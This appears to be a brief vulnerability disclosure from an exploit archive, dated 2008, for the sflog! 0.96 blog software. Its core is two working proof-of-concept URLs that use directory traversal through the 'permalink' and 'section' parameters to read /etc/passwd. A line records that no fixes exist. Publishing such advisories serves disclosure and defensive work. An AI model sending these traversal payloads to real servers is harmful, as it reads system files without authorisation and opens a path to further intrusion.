sflog! 0.96 Remote File Disclosure Vulnerabilities

2008-01-31 00:00:00

sflog! 0.96 remote file disclosure vulnerabilities

download http://sourceforge.net/projects/sflog/

author muuratsalo
contact muuratsalo[at]gmail.com

exploits
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd

#

Fixes

No fixes

In order to submit a new fix you need to be registered.